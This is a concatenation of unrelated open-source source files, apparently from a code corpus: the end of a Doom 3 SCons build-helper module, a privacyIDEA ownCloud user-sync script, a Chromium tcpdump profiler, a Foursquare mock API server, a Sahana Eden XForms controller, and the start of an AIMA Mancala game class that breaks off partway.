return ret[ 1 ]
def TrySimpleCommand( self, cmd ):
print cmd
ret = commands.getstatusoutput( cmd )
sys.stdout.write( ret[ 1 ] )
def M4Processing( self, file, d ):
file_out = file[:-3]
cmd = 'm4 '
for ( key, val ) in d.items():
cmd += '--define=%s="%s" ' % ( key, val )
cmd += '%s > %s' % ( file, file_out )
self.SimpleCommand( cmd )
def ExtractProtocolVersion( self ):
f = open( 'framework/Licensee.h' )
l = f.readlines()
f.close()
major = 'X'
p = re.compile( '^#define ASYNC_PROTOCOL_MAJOR\t*(.*)' )
for i in l:
if ( p.match( i ) ):
major = p.match( i ).group(1)
break
f = open( 'framework/async/AsyncNetwork.h' )
l = f.readlines()
f.close()
minor = 'X'
p = re.compile( '^const int ASYNC_PROTOCOL_MINOR\t*= (.*);' )
for i in l:
if ( p.match( i ) ):
minor = p.match( i ).group(1)
break
return '%s.%s' % ( major, minor )
def ExtractEngineVersion( self ):
f = open( 'framework/Licensee.h' )
l = f.readlines()
f.close()
version = 'X'
p = re.compile( '^#define.*ENGINE_VERSION\t*"DOOM (.*)"' )
for i in l:
if ( p.match( i ) ):
version = p.match( i ).group(1)
break
return version
def ExtractBuildVersion( self ):
f = open( 'framework/BuildVersion.h' )
l = f.readlines()[ 4 ]
f.close()
pat = re.compile( '.* = (.*);\n' )
return pat.split( l )[ 1 ]
def checkLDD( target, source, env ):
file = target[0]
if (not os.path.isfile(file.abspath)):
print('ERROR: CheckLDD: target %s not found\n' % target[0])
Exit(1)
( status, output ) = commands.getstatusoutput( 'ldd -r %s' % file )
# if ( status != 0 ):
# print 'ERROR: ldd command returned with exit code %d' % status
# os.system( 'rm %s' % target[ 0 ] )
# sys.exit(1)
lines = string.split( output, '\n' )
have_undef = 0
for i_line in lines:
#print repr(i_line)
regex = re.compile('undefined symbol: (.*)\t\\((.*)\\)')
if ( regex.match(i_line) ):
symbol = regex.sub('\\1', i_line)
try:
env['ALLOWED_SYMBOLS'].index(symbol)
except:
have_undef = 1
if ( have_undef ):
print output
print "ERROR: undefined symbols"
os.system('rm %s' % target[0])
sys.exit(1)
def SharedLibrarySafe( env, target, source ):
ret = env.SharedLibrary( target, source )
env.AddPostAction( ret, checkLDD )
return ret
def NotImplementedStub( *whatever ):
print 'Not Implemented'
sys.exit( 1 )
# --------------------------------------------------------------------
class idGamePaks( idSetupBase ):
def BuildGamePak( self, target = None, source = None, env = None ):
# NOTE: we should have done this with the zipfile module
temp_dir = tempfile.mkdtemp( prefix = 'gamepak' )
self.SimpleCommand( 'cp %s %s' % ( source[0].abspath, os.path.join( temp_dir, 'game%s.so' % ( cpu ) ) ) )
#self.SimpleCommand( 'strip %s' % os.path.join( temp_dir, 'game%s.so' % ( cpu ) ) )
self.SimpleCommand( 'echo 2 > %s' % ( os.path.join( temp_dir, 'binary.conf' ) ) )
self.SimpleCommand( 'cd %s ; zip %s game%s.so binary.conf' % ( temp_dir, os.path.join( temp_dir, target[0].abspath ), cpu ) )
self.SimpleCommand( 'rm -r %s' % temp_dir )
return None
# --------------------------------------------------------------------
# get a clean error output when running multiple jobs
def SetupBufferedOutput( env, silent ):
buf = idBuffering()
buf.silent = silent
buf.env = env
env['SPAWN'] = buf.buffered_spawn
# setup utilities on an environement
def SetupUtils( env ):
gamepaks = idGamePaks()
env.BuildGamePak = gamepaks.BuildGamePak
env.SharedLibrarySafe = SharedLibrarySafe
def BuildList( s_prefix, s_string ):
s_list = string.split( s_string )
for i in range( len( s_list ) ):
s_list[ i ] = s_prefix + '/' + s_list[ i ]
return s_list
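# Sketch of how an SConscript typically consumes these helpers (environment and
# file names are assumptions, not part of this module):
#
#   env = Environment()
#   SetupBufferedOutput(env, silent=False)
#   SetupUtils(env)
#   sources = BuildList('renderer', 'tr_backend.cpp tr_light.cpp tr_main.cpp')
#   env.SharedLibrarySafe('game', sources)   # runs the ldd undefined-symbol check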
| gpl-3.0 |
privacyidea/privacyidea | tools/privacyidea-sync-owncloud.py | 1 | 8313 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# 2020-04-28 Cornelius Kölbel <[email protected]>
# Read tables oc_accounts and oc_users from owncloud
#
from __future__ import print_function
__doc__ = """You can use this script to read the tables oc_accounts and
oc_users from owncloud and fill a local user table in privacyIDEA.
Run this script in a cron job. It will read the users from ownCloud and
* insert new users
* update changed users
* remove deleted users
"""
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.sql import select
from sqlalchemy.schema import ForeignKey
from sqlalchemy import (Table, MetaData, Column, Integer, Unicode, Boolean,
UnicodeText)
import sys
import json
import getopt
import binascii
import os
import re
EXAMPLE_CONFIG_FILE = """{
"SQL": {
"OWNCLOUD_URI": "mysql+pymysql://oc:password@localhost/oc",
"PRIVACYIDEA_URI": "mysql+pymysql://pi:password@localhost/pi?charset=utf8mb4",
"LOCAL_TABLE": "pi_oc_users",
"INSERT_CHUNK_SIZE": 10000
}
}"""
class Config(object):
def __init__(self, config_file):
with open(config_file, "r") as f:
contents = f.read()
config = json.loads(contents)
self.OWNCLOUD_URI = config.get("SQL").get("OWNCLOUD_URI")
self.PRIVACYIDEA_URI = config.get("SQL").get("PRIVACYIDEA_URI")
self.LOCAL_TABLE = config.get("SQL").get("LOCAL_TABLE")
self.INSERT_CHUNK_SIZE = config.get("SQL").get("INSERT_CHUNK_SIZE")
def sync_owncloud(config_obj):
metadata = MetaData()
user_table = Table(config_obj.LOCAL_TABLE, metadata,
Column("id", Integer, primary_key=True, nullable=False),
Column("email", Unicode(255), nullable=True),
Column("user_id", Unicode(255), nullable=False, unique=True),
Column("lower_user_id", Unicode(255), nullable=False, unique=True),
Column("display_name", Unicode(255)),
Column("backend", Unicode(64)),
Column("last_login", Integer, default=0),
Column("state", Integer, default=0),
Column("password", Unicode(255), nullable=False)
)
oc_accounts_table = Table("oc_accounts", metadata,
Column("id", Integer, primary_key=True, nullable=False),
Column("email", Unicode(255), nullable=True),
Column("user_id", Unicode(255), nullable=False, unique=True),
Column("lower_user_id", Unicode(255), nullable=False, unique=True),
Column("display_name", Unicode(255)),
Column("backend", Unicode(64)),
Column("last_login", Integer, default=0),
Column("state", Integer, default=0)
)
oc_users_table = Table("oc_users", metadata,
Column("uid", Unicode(255), ForeignKey("oc_accounts.user_id")),
Column("password", Unicode(255), nullable=False)
)
oc_engine = create_engine(config_obj.OWNCLOUD_URI)
privacyidea_engine = create_engine(config_obj.PRIVACYIDEA_URI)
print("Creating table {0!s}, if it does not exist.".format(config_obj.LOCAL_TABLE))
metadata.create_all(privacyidea_engine)
conn_oc = oc_engine.connect()
conn_pi = privacyidea_engine.connect()
def insert_chunks(conn, table, values, chunk_size=100000):
"""
Split **values** into chunks of size **chunk_size** and insert them sequentially.
"""
values_length = len(values)
for chunk in range(0, values_length, chunk_size):
print('Insert records {} to {} ...'.format(chunk, min(chunk + chunk_size,
values_length) - 1))
try:
conn.execute(table.insert(), values[chunk:chunk + chunk_size])
except Exception as err:
t = 'Failed to insert chunk: {0!s}'.format(err)
warnings.append(t)
print(t)
warnings = []
s = select([oc_accounts_table, oc_users_table.c.password]).select_from(
oc_accounts_table.join(oc_users_table, oc_users_table.c.uid == oc_accounts_table.c.user_id))
owncloud_source = conn_oc.execute(s)
s = select([user_table])
privacyidea_dest = conn_pi.execute(s)
# Build a dict with the existing users
pi_users = {}
for r in privacyidea_dest:
pi_users[r.id] = r
pi_users_insert = []
pi_users_update = []
unchanged = 0
for r in owncloud_source:
if r.id not in pi_users.keys():
# This is a new entry
pi_users_insert.append(dict(id=r.id, email=r.email, user_id=r.user_id,
lower_user_id=r.lower_user_id, display_name=r.display_name, password=r.password,
backend=r.backend, last_login=r.last_login, state=r.state))
else:
# This is an existing entry
# Check if the entry is the same
if r == pi_users[r.id]:
# The values are the same
print("Entry {0!s}/{1!s} unchanged.".format(r.id, r.user_id))
unchanged += 1
else:
# add to update
pi_users_update.append(dict(id=r.id, email=r.email, user_id=r.user_id,
lower_user_id=r.lower_user_id, display_name=r.display_name, password=r.password,
backend=r.backend, last_login=r.last_login, state=r.state))
# Delete entry from the privacyIDEA user list
del(pi_users[r.id])
pi_users_delete = pi_users
print("Processing...")
print("{0!s} new entries.".format(len(pi_users_insert)))
print("{0!s} unchanged entries.".format(unchanged))
print("{0!s} updated entries.".format(len(pi_users_update)))
print("{0!s} removed entries.".format(len(pi_users_delete)))
if len(pi_users_insert):
print("Inserting new entries.")
insert_chunks(conn_pi, user_table, pi_users_insert, config_obj.INSERT_CHUNK_SIZE)
if len(pi_users_update):
print("Updating entries.")
for upd in pi_users_update:
stmt = user_table.update().where(user_table.c.id == upd.get("id")).values(upd)
conn_pi.execute(stmt)
if len(pi_users_delete):
print("Deleting removed entries.")
for udel in pi_users_delete:
stmt = user_table.delete().where(user_table.c.id == udel)
conn_pi.execute(stmt)
if warnings:
print("We need to inform you about the following WARNINGS:")
for warning in warnings:
print(warning)
def usage():
print("""
privacyidea-sync-owncloud.py --generate-example-config [--config <config file>]
--generate-example-config, -g Output an example config file.
This is a JSON file, that needs to be passed
to this command.
--config, -c <file> The config file, that contains the complete
configuration.
{0!s}""".format(__doc__))
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "gc:", ["generate-example-config", "config="])
except getopt.GetoptError as e:
print(str(e))
sys.exit(1)
config_file = None
generate_config = False
for o, a in opts:
if o in ("-g", "--generate-example-config"):
generate_config = True
print(EXAMPLE_CONFIG_FILE)
elif o in ("-c", "--config"):
config_file = a
else:
print(u"Unknown parameter: {0!s}".format(o))
sys.exit(3)
if config_file:
config_obj = Config(config_file)
sync_owncloud(config_obj)
sys.exit(0)
else:
if not generate_config:
usage()
sys.exit(1)
if __name__ == '__main__':
main()
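# Example invocation (file name is hypothetical):
#   ./privacyidea-sync-owncloud.py --generate-example-config > owncloud-sync.json
#   ... edit owncloud-sync.json (database URIs, table name, chunk size) ...
#   ./privacyidea-sync-owncloud.py --config owncloud-sync.json   # e.g. from cron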
| agpl-3.0 |
geekboxzone/lollipop_external_chromium_org | tools/telemetry/telemetry/core/platform/profiler/tcpdump_profiler.py | 48 | 4160 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import signal
import subprocess
import sys
import tempfile
from telemetry.core.platform import profiler
from telemetry.core.platform.profiler import android_prebuilt_profiler_helper
_TCP_DUMP_BASE_OPTS = ['-i', 'any', '-p', '-s', '0', '-w']
class _TCPDumpProfilerAndroid(object):
"""An internal class to collect TCP dumps on android.
This profiler uses pre-built binaries from AOSP.
See more details in prebuilt/android/README.txt.
"""
_DEVICE_DUMP_FILE = '/sdcard/tcpdump_profiles/capture.pcap'
def __init__(self, adb, output_path):
self._adb = adb
self._output_path = output_path
self._adb.RunShellCommand('mkdir -p ' +
os.path.dirname(self._DEVICE_DUMP_FILE))
self._proc = subprocess.Popen(
['adb', '-s', self._adb.device_serial(),
'shell', android_prebuilt_profiler_helper.GetDevicePath('tcpdump')] +
_TCP_DUMP_BASE_OPTS +
[self._DEVICE_DUMP_FILE])
def CollectProfile(self):
tcpdump_pid = self._adb.ExtractPid('tcpdump')
if not tcpdump_pid or not tcpdump_pid[0]:
raise Exception('Unable to find TCPDump. Check your device is rooted '
'and tcpdump is installed at ' +
android_prebuilt_profiler_helper.GetDevicePath('tcpdump'))
self._adb.RunShellCommand('kill -term ' + tcpdump_pid[0])
self._proc.terminate()
host_dump = os.path.join(self._output_path,
os.path.basename(self._DEVICE_DUMP_FILE))
self._adb.device().old_interface.Adb().Pull(self._DEVICE_DUMP_FILE,
host_dump)
print 'TCP dump available at: %s ' % host_dump
print 'Use Wireshark to open it.'
return host_dump
class _TCPDumpProfilerLinux(object):
"""An internal class to collect TCP dumps on linux desktop."""
_DUMP_FILE = 'capture.pcap'
def __init__(self, output_path):
if not os.path.exists(output_path):
os.makedirs(output_path)
self._dump_file = os.path.join(output_path, self._DUMP_FILE)
self._tmp_output_file = tempfile.NamedTemporaryFile('w', 0)
try:
self._proc = subprocess.Popen(
['tcpdump'] + _TCP_DUMP_BASE_OPTS + [self._dump_file],
stdout=self._tmp_output_file, stderr=subprocess.STDOUT)
except OSError as e:
raise Exception('Unable to execute TCPDump, please check your '
'installation. ' + str(e))
def CollectProfile(self):
self._proc.send_signal(signal.SIGINT)
exit_code = self._proc.wait()
try:
if exit_code:
raise Exception(
'tcpdump failed with exit code %d. Output:\n%s' %
(exit_code, self._GetStdOut()))
finally:
self._tmp_output_file.close()
print 'TCP dump available at: ', self._dump_file
print 'Use Wireshark to open it.'
return self._dump_file
def _GetStdOut(self):
self._tmp_output_file.flush()
try:
with open(self._tmp_output_file.name) as f:
return f.read()
except IOError:
return ''
class TCPDumpProfiler(profiler.Profiler):
"""A Factory to instantiate the platform-specific profiler."""
def __init__(self, browser_backend, platform_backend, output_path, state):
super(TCPDumpProfiler, self).__init__(
browser_backend, platform_backend, output_path, state)
if platform_backend.GetOSName() == 'android':
android_prebuilt_profiler_helper.InstallOnDevice(
browser_backend.adb.device(), 'tcpdump')
self._platform_profiler = _TCPDumpProfilerAndroid(
browser_backend.adb, output_path)
else:
self._platform_profiler = _TCPDumpProfilerLinux(output_path)
@classmethod
def name(cls):
return 'tcpdump'
@classmethod
def is_supported(cls, browser_type):
if browser_type.startswith('cros'):
return False
if sys.platform.startswith('linux'):
return True
return browser_type.startswith('android')
def CollectProfile(self):
return self._platform_profiler.CollectProfile()
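# For reference, the desktop branch above effectively runs (sketch):
#   tcpdump -i any -p -s 0 -w <output_path>/capture.pcap
# and stops the capture with SIGINT when CollectProfile() is called; the Android
# branch runs the prebuilt tcpdump via adb and pulls the .pcap back to the host.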
| bsd-3-clause |
hunanlike/foursquared | mock_server/playfoursquare.py | 134 | 2253 | #!/usr/bin/python2.6
#
# Simple http server to emulate api.playfoursquare.com
import logging
import shutil
import sys
import urlparse
import SimpleHTTPServer
import BaseHTTPServer
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Handle playfoursquare.com requests, for testing."""
def do_GET(self):
logging.warn('do_GET: %s, %s', self.command, self.path)
url = urlparse.urlparse(self.path)
logging.warn('do_GET: %s', url)
query = urlparse.parse_qs(url.query)
query_keys = [pair[0] for pair in query]
response = self.handle_url(url)
if response != None:
self.send_200()
shutil.copyfileobj(response, self.wfile)
self.wfile.close()
do_POST = do_GET
def handle_url(self, url):
path = None
if url.path == '/v1/venue':
path = '../captures/api/v1/venue.xml'
elif url.path == '/v1/addvenue':
path = '../captures/api/v1/venue.xml'
elif url.path == '/v1/venues':
path = '../captures/api/v1/venues.xml'
elif url.path == '/v1/user':
path = '../captures/api/v1/user.xml'
elif url.path == '/v1/checkcity':
path = '../captures/api/v1/checkcity.xml'
elif url.path == '/v1/checkins':
path = '../captures/api/v1/checkins.xml'
elif url.path == '/v1/cities':
path = '../captures/api/v1/cities.xml'
elif url.path == '/v1/switchcity':
path = '../captures/api/v1/switchcity.xml'
elif url.path == '/v1/tips':
path = '../captures/api/v1/tips.xml'
elif url.path == '/v1/checkin':
path = '../captures/api/v1/checkin.xml'
elif url.path == '/history/12345.rss':
path = '../captures/api/v1/feed.xml'
if path is None:
self.send_error(404)
else:
logging.warn('Using: %s' % path)
return open(path)
def send_200(self):
self.send_response(200)
self.send_header('Content-type', 'text/xml')
self.end_headers()
def main():
if len(sys.argv) > 1:
port = int(sys.argv[1])
else:
port = 8080
server_address = ('0.0.0.0', port)
httpd = BaseHTTPServer.HTTPServer(server_address, RequestHandler)
sa = httpd.socket.getsockname()
print "Serving HTTP on", sa[0], "port", sa[1], "..."
httpd.serve_forever()
if __name__ == '__main__':
main()
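# Example request against the mock server (default port 8080), which maps the
# API path to a canned capture file:
#   curl http://localhost:8080/v1/venues    # served from ../captures/api/v1/venues.xml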
| apache-2.0 |
sahildua2305/eden | controllers/xforms.py | 8 | 14374 | # -*- coding: utf-8 -*-
"""
XForms - Controllers
"""
module = request.controller
# -----------------------------------------------------------------------------
def create():
"""
Given a Table, returns an XForms to create an instance:
http://code.javarosa.org/wiki/buildxforms
http://www.w3schools.com/xforms/
http://oreilly.com/catalog/9780596003692/preview.html
Known field requirements that don't work properly:
IS_IN_DB
IS_NOT_ONE_OF
IS_EMAIL
IS_DATE_IN_RANGE
IS_DATETIME_IN_RANGE
"""
try:
tablename = request.args[0]
except:
session.error = T("Need to specify a table!")
redirect(URL(r=request))
title = tablename
table = s3db[tablename]
instance_list = []
bindings_list = []
controllers_list = []
itext_list = [TAG["text"](TAG["value"](s3.crud_strings[tablename].title_list),
_id="title")]
for fieldname in table.fields:
if fieldname in ["id", "created_on", "modified_on", "uuid", "mci",
"deleted", "created_by", "modified_by", "deleted_fk",
"owned_by_group", "owned_by_user"]:
# These will get added server-side
pass
elif table[fieldname].writable == False:
pass
else:
ref = "/" + title + "/" + fieldname
instance_list.append(generate_instance(table, fieldname))
bindings_list.append(generate_bindings(table, fieldname, ref))
controller, _itext_list = generate_controllers(table, fieldname, ref)
controllers_list.append(controller)
itext_list.extend(_itext_list)
#bindings_list.append(TAG["itext"](TAG["translation"](itext_list, _lang="eng")))
instance = TAG[title](instance_list, _xmlns="")
bindings = bindings_list
controllers = TAG["h:body"](controllers_list)
response.headers["Content-Type"] = "text/xml"
response.view = "xforms.xml"
return dict(title=title, instance=instance, bindings=bindings,
controllers=controllers, itext_list=itext_list)
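# Illustrative fragment of the kind of markup the pieces above produce for a
# hypothetical table "pr_person" with one writable string field "first_name"
# (element layout is a sketch; the full document is assembled by xforms.xml):
#
#   <pr_person xmlns=""><first_name/></pr_person>                        <!-- instance -->
#   <bind nodeset="/pr_person/first_name" type="string" required="false()"/>
#   <input ref="/pr_person/first_name"><label>First Name</label></input>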
# -----------------------------------------------------------------------------
def uses_requirement(requirement, field):
"""
Check if a given database field uses the specified requirement
(IS_IN_SET, IS_INT_IN_RANGE, etc)
"""
if hasattr(field.requires, "other") or requirement in str(field.requires):
if hasattr(field.requires, "other"):
if requirement in str(field.requires.other):
return True
elif requirement in str(field.requires):
return True
return False
# -----------------------------------------------------------------------------
def generate_instance(table, fieldname):
"""
Generates XML for the instance of the specified field.
"""
if table[fieldname].default:
instance = TAG[fieldname](table[fieldname].default)
else:
instance = TAG[fieldname]()
return instance
# -----------------------------------------------------------------------------
def generate_bindings(table, fieldname, ref):
"""
Generates the XML for bindings for the specified database field.
"""
field = table[fieldname]
if "IS_NOT_EMPTY" in str(field.requires):
required = "true()"
else:
required = "false()"
if field.type == "string":
_type = "string"
elif field.type == "double":
_type = "decimal"
# Collect doesn't support datetime yet
elif field.type == "date":
_type = "date"
elif field.type == "datetime":
_type = "datetime"
elif field.type == "integer":
_type = "int"
elif field.type == "boolean":
_type = "boolean"
elif field.type == "upload": # For images
_type = "binary"
elif field.type == "text":
_type = "text"
else:
# Unknown type
_type = "string"
if uses_requirement("IS_INT_IN_RANGE", field) \
or uses_requirement("IS_FLOAT_IN_RANGE", field):
if hasattr(field.requires, "other"):
maximum = field.requires.other.maximum
minimum = field.requires.other.minimum
else:
maximum = field.requires.maximum
minimum = field.requires.minimum
if minimum is None:
constraint = "(. < " + str(maximum) + ")"
elif maximum is None:
constraint = "(. > " + str(minimum) + ")"
else:
constraint = "(. > " + str(minimum) + " and . < " + str(maximum) + ")"
binding = TAG["bind"](_nodeset=ref,
_type=_type,
_required=required,
_constraint=constraint)
#elif uses_requirement("IS_DATETIME_IN_RANGE", field):
# pass
#elif uses_requirement("IS_EMAIL", field):
# pass
elif uses_requirement("IS_IN_SET", field):
binding = TAG["bind"](_nodeset=ref, _required=required)
else:
binding = TAG["bind"](_nodeset=ref, _type=_type, _required=required)
return binding
# -----------------------------------------------------------------------------
def generate_controllers(table, fieldname, ref):
"""
Generates the controllers XML for the database table field.
"""
itext_list = [] # Internationalization
controllers_list = []
field = table[fieldname]
itext_list.append(TAG["text"](TAG["value"](field.label),
_id=ref + ":label"))
itext_list.append(TAG["text"](TAG["value"](field.comment),
_id=ref + ":hint"))
if hasattr(field.requires, "option"):
items_list = []
for option in field.requires.theset:
items_list.append(TAG["item"](TAG["label"](option), TAG["value"](option)))
controllers_list.append(TAG["select1"](items_list, _ref=fieldname))
#elif uses_requirement("IS_IN_DB", field):
# ToDo (similar to IS_IN_SET)?
#pass
#elif uses_requirement("IS_NOT_ONE_OF", field):
# ToDo
#pass
elif uses_requirement("IS_IN_SET", field): # Defined below
if hasattr(field.requires, "other"):
insetrequires = field.requires.other
else:
insetrequires = field.requires
theset = insetrequires.theset
items_list = []
items_list.append(TAG["label"](_ref="jr:itext('" + ref + ":label')"))
items_list.append(TAG["hint"](_ref="jr:itext('" + ref + ":hint')"))
if theset:
option_num = 0 # for formatting something like "jr:itext('stuff:option0')"
for option in theset:
if field.type == "integer":
option = int(option)
option_ref = ref + ":option" + str(option_num)
items_list.append(TAG["item"](TAG["label"](_ref="jr:itext('" + option_ref + "')"),
TAG["value"](option)))
#itext_list.append(TAG["text"](TAG["value"](field.represent(option)), _id=option_ref))
itext_list.append(TAG["text"](TAG["value"](insetrequires.labels[theset.index(str(option))]),
_id=option_ref))
option_num += 1
if insetrequires.multiple:
controller = TAG["select"](items_list, _ref=ref)
else:
controller = TAG["select1"](items_list, _ref=ref)
elif field.type == "boolean": # Using select1, is there an easier way to do this?
items_list=[]
items_list.append(TAG["label"](_ref="jr:itext('" + ref + ":label')"))
items_list.append(TAG["hint"](_ref="jr:itext('" + ref + ":hint')"))
# True option
items_list.append(TAG["item"](TAG["label"](_ref="jr:itext('" + ref + ":option0')"),
TAG["value"](1)))
itext_list.append(TAG["text"](TAG["value"]("True"),
_id=ref + ":option0"))
# False option
items_list.append(TAG["item"](TAG["label"](_ref="jr:itext('" + ref + ":option1')"),
TAG["value"](0)))
itext_list.append(TAG["text"](TAG["value"]("False"),
_id=ref + ":option1"))
controller = TAG["select1"](items_list, _ref=ref)
elif field.type == "upload": # For uploading images
        items_list = []
items_list.append(TAG["label"](_ref="jr:itext('" + ref + ":label')"))
items_list.append(TAG["hint"](_ref="jr:itext('" + ref + ":hint')"))
controller = TAG["upload"](items_list, _ref=ref, _mediatype="image/*")
    elif not field.writable:
        # Render read-only fields as prefilled inputs; guard against fields
        # that have no default value.
        default = field.default.upper() if field.default else ""
        controller = TAG["input"](TAG["label"](field.label), _ref=ref,
                                  _readonly="true",
                                  _default=default)
else:
# Normal Input field
controller = TAG["input"](TAG["label"](field.label), _ref=ref)
return controller, itext_list
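# Hedged illustration (field name and option values are invented): an
# IS_IN_SET field typically produces a controller such as
#   <select1 ref="/tablename/status">
#     <label ref="jr:itext('/tablename/status:label')"/>
#     <hint ref="jr:itext('/tablename/status:hint')"/>
#     <item><label ref="jr:itext('/tablename/status:option0')"/><value>open</value></item>
#   </select1>
# with the matching <text> entries returned in itext_list for translation.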
# -----------------------------------------------------------------------------
def csvdata(nodelist):
"""
Returns the data in the given node as a comma separated string
"""
data = ""
for subnode in nodelist:
if (subnode.nodeType == subnode.ELEMENT_NODE):
            try:
                data = data + "," + subnode.childNodes[0].data
            except (IndexError, AttributeError):
                # Empty element: contribute an empty column
                data = data + ","
return data[1:] + "\n"
# -----------------------------------------------------------------------------
def csvheader(parent, nodelist):
"""
Gives the header for the CSV
"""
header = ""
for subnode in nodelist:
if (subnode.nodeType == subnode.ELEMENT_NODE):
header = header + "," + parent + "." + subnode.tagName
return header[1:] + "\n"
# -----------------------------------------------------------------------------
def importxml(db, xmlinput):
"""
Converts the XML to a CSV compatible with the import_from_csv_file of web2py
@ToDo: rewrite this to go via S3Resource for proper Auth checking, Audit.
"""
import cStringIO
import xml.dom.minidom
try:
doc = xml.dom.minidom.parseString(xmlinput)
except:
raise Exception("XML parse error")
parent = doc.childNodes[0].tagName
csvout = csvheader(parent, doc.childNodes[0].childNodes)
for subnode in doc.childNodes:
csvout = csvout + csvdata(subnode.childNodes)
fh = cStringIO.StringIO()
fh.write(csvout)
fh.seek(0, 0)
db[parent].import_from_csv_file(fh)
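# Hedged sketch of the conversion performed by csvheader()/csvdata() above
# (table and field names are made up): an input document such as
#   <pr_person><first_name>Mary</first_name><gender>2</gender></pr_person>
# is flattened to the CSV
#   pr_person.first_name,pr_person.gender
#   Mary,2
# which import_from_csv_file() then loads into db.pr_person.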
# -----------------------------------------------------------------------------
@auth.s3_requires_membership(1)
def post():
data = importxml(db, request.body.read())
return data
# -----------------------------------------------------------------------------
def formList():
"""
Generates a list of Xforms based on database tables for ODK Collect
http://code.google.com/p/opendatakit/
"""
# Test statements
#xml = TAG.forms(*[TAG.form(getName("Name"), _url = "http://" + request.env.http_host + URL(c="static", "current.xml"))])
#xml = TAG.forms(*[TAG.form(getName(t), _url = "http://" + request.env.http_host + URL(f="create", args=t)) for t in db.tables()])
# List of a couple simple tables to avoid a giant list of all the tables
#tables = ["pf_missing_report", "pr_presence"]
tables = ["irs_ireport", "rms_req", "cr_shelter", "pr_person", "pr_image"]
xml = TAG.forms()
for tablename in tables:
xml.append(TAG.form(get_name(tablename),
_url = "http://" + request.env.http_host + URL(f="create", args=tablename)))
response.headers["Content-Type"] = "text/xml"
response.view = "xforms.xml"
return xml
# -----------------------------------------------------------------------------
def submission():
"""
Allows for submission of Xforms by ODK Collect
http://code.google.com/p/opendatakit/
"""
# @ToDo: Something better than this crude check
if not auth.s3_logged_in():
auth.permission.fail()
try:
from cStringIO import StringIO # Faster, where available
    except ImportError:
from StringIO import StringIO
import cgi
from lxml import etree
source = request.post_vars.get("xml_submission_file", None)
if isinstance(source, cgi.FieldStorage):
if source.filename:
xmlinput = source.file
else:
xmlinput = source.value
if isinstance(xmlinput, basestring):
xmlinput = StringIO(xmlinput)
else:
raise HTTP(400, "Invalid Request: Expected an XForm")
tree = etree.parse(xmlinput)
tablename = tree.getroot().tag
resource = s3db.resource(tablename)
stylesheet = os.path.join(request.folder, "static", "formats", "odk",
"import.xsl")
try:
result = resource.import_xml(source=tree, stylesheet=stylesheet)
    except (IOError, SyntaxError):
raise HTTP(500, "Internal server error")
# Parse response
status = json.loads(result)["statuscode"]
if status == 200:
r = HTTP(201, "Saved") # ODK Collect only accepts 201
r.headers["Location"] = request.env.http_host
raise r
else:
raise HTTP(status, result)
# -----------------------------------------------------------------------------
@auth.s3_requires_membership(2)
def submission_old():
"""
Allows for submission of xforms by ODK Collect
http://code.google.com/p/opendatakit/
"""
response.headers["Content-Type"] = "text/xml"
xml = str(request.post_vars.xml_submission_file.value)
if len(xml) == 0:
raise HTTP(400, "Need some xml!")
importxml(db, xml)
r = HTTP(201, "Saved.")
r.headers["Location"] = request.env.http_host
raise r
# -----------------------------------------------------------------------------
def get_name(tablename):
"""
Generates a pretty(er) name from a database table name.
"""
return tablename[tablename.find("_") + 1:].replace("_", " ").capitalize()
# END =========================================================================
| mit |
WmHHooper/aima-python | submissions/Brock/mygames.py | 1 | 13497 | from collections import namedtuple
from games import (Game)
from queue import PriorityQueue
from copy import deepcopy
# class GameState:
# def __init__(self, to_move, board, label=None, depth=8):
# self.to_move = to_move
# self.board = board
# self.label = label
# self.maxDepth = depth
#
# def __str__(self):
# if self.label == None:
# return super(GameState, self).__str__()
# return self.label
class Board:
def __init__(self, length, a_spots, b_spots, a_pool, b_pool):
self.length = length
self.a_spots = a_spots
self.b_spots = b_spots
self.a_pool = a_pool
self.b_pool = b_pool
class GameState:
def __init__(self, to_move, board, label=None, depth=8):
self.to_move = to_move
self.board = board
self.label = label
self.maxDepth = depth
def __str__(self):
if self.label == None:
return super(GameState, self).__str__()
return self.label
class Mancala(Game):
"""A flagrant copy of TicTacToe, from game.py
It's simplified, so that moves and utility are calculated as needed
Play TicTacToe on an h x v board, with Max (first player) playing 'X'.
A state has the player to move and a board, in the form of
a dict of {(x, y): Player} entries, where Player is 'X' or 'O'."""
def __init__(self):
self.initial = GameState(to_move='A', board={})
self.extraMoveA = False
self.extraMoveB = False
def actions(self, state):
        try:
            return state.moves
        except AttributeError:
            pass
        # Legal moves are any pits on the mover's side that still hold pieces.
moves = []
if state.to_move == 'A':
for a in range (0, state.board.length):
if state.board.a_spots[a] > 0:
moves.append(a)
if state.to_move == 'B':
for b in range (0, state.board.length):
if state.board.b_spots[b] > 0:
moves.append(b)
state.moves = moves
return moves
# defines the order of play
def opponent(self, player):
if player == 'A' and self.extraMoveA == False:
return 'B'
if player == 'A' and self.extraMoveA == True:
self.extraMoveA = False
return 'A'
if player == 'B' and self.extraMoveB == False:
return 'A'
if player == 'B' and self.extraMoveB == True:
self.extraMoveB = False
return 'B'
return None
def result(self, state, move):
if move not in self.actions(state):
return state # Illegal move has no effect
board = deepcopy(state.board)
player = state.to_move
if player == 'A':
amount = 0
amount = board.a_spots[move]
board.a_spots[move] = 0
for a in range (move+1, board.length):
if amount != 0:
board.a_spots[a] = board.a_spots[a] + 1
amount = amount - 1
            if amount > 0:
                # One piece drops into A's pool as the sowing passes it
                board.a_pool = board.a_pool + 1
                amount = amount - 1
                if amount == 0:
                    # The last piece landed in A's pool: A moves again
                    self.extraMoveA = True
for b in range(0, board.length):
if amount != 0:
board.b_spots[b] = board.b_spots[b] + 1
amount = amount - 1
if player == 'B':
amount = 0
amount = board.b_spots[move]
board.b_spots[move] = 0
for b in range(move+1, board.length):
if amount != 0:
board.b_spots[b] = board.b_spots[b] + 1
amount = amount - 1
            if amount > 0:
                # One piece drops into B's pool as the sowing passes it
                board.b_pool = board.b_pool + 1
                amount = amount - 1
                if amount == 0:
                    # The last piece landed in B's pool: B moves again
                    self.extraMoveB = True
for a in range(0, board.length):
if amount != 0:
board.a_spots[a] = board.a_spots[a] + 1
amount = amount - 1
next_mover = self.opponent(player)
return GameState(to_move=next_mover, board=board)
    def utility(self, state, player):
        "Return the piece differential from the given player's point of view."
        try:
